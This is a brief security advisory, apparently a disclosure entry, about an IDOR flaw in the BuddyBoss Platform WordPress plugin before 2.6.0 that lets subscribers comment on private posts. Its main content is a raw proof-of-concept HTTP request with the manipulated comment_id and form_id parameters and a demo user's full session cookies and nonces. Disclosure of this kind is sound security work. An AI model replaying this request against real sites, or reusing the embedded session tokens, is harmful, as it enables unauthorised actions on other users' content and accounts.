BuddyBoss Platform < 2.6.0 - Subscriber+ Comment on Private Post via IDOR

Description The plugin contains an IDOR vulnerability that allows a user to comment on a private post by manipulating the ID included in the request

PoC

POST /wp-admin/admin-ajax.php HTTP/2 Host: online-communities.demos.buddyboss.com Cookie: wordpress_sec_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7Cad6f4652de2481a56e68bdd28c294386fae37234e735065d6b90abd61ec052e9; _gcl_au=1.1.780899166.1702488357; _ga_YJ9BETCSZM=GS1.1.1702488357.1.1.1702489668.60.0.0; _ga=GA1.2.700400885.1702488358; _pin_unauth=dWlkPU1qWmpOVGhsTVRBdE16QmtNUzAwWVRJd0xXRmhaV1V0TURWaE1XUm1aall5WTJFeQ; _gid=GA1.2.1652937291.1702488358; psuid=9ba8f98a-a8df-4e85-be53-540ffc862ed1; ps5b7449d2840fc1452412f2fe=true|1700697600000; _fbp=fb.1.1702488359281.1942424250; ab-sandbox_019a643733c4caf6b40a23bdf343c136=66566579e92883ee8%7C256035; tk_ai=woo%3AYqcaaRyMBwKX1aMgKwlMVWzS; redux_current_tab=undefined; redux_current_tab_get=undefined; redux_current_tab_buddyboss_theme_options=undefined; tk_qs=; wordpress_test_cookie=WP%20Cookie%20check; _lscache_vary=5e5b26d2ede9d2856d58613b04cbbc5c; wordpress_logged_in_019a643733c4caf6b40a23bdf343c136=adele%7C1702662340%7CdLmTduSfxoM9xFZHKg8WhPsomZWnfZ9AygNoItpBNfs%7C6dc658c846e2a136591d87ec20e80fe6176895bdbbbafc955959dcb2f9b35889; _gat_UA-235369-35=1; _uetsid=ae00a78099dc11eeb8b089e40d4468de; _uetvid=ae008bf099dc11ee8decf552a53d469a User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: https://online-communities.demos.buddyboss.com/members/adele/ Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 195 Origin: https://online-communities.demos.buddyboss.com Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers scope=all&nonce;=2081885524&action;=new_activity_comment&_wpnonce_new_activity_comment=bc95aefd23&comment;_id=194628&form;_id=194628&content;=%3Cp%3ETHIS+SHOULD+NOT+HAPPEN%3Cbr%3E%3C%2Fp%3E&modbypass;= The vulnerability was identified in the comment_id and form_id parameters which allowed private post to be commented as another user.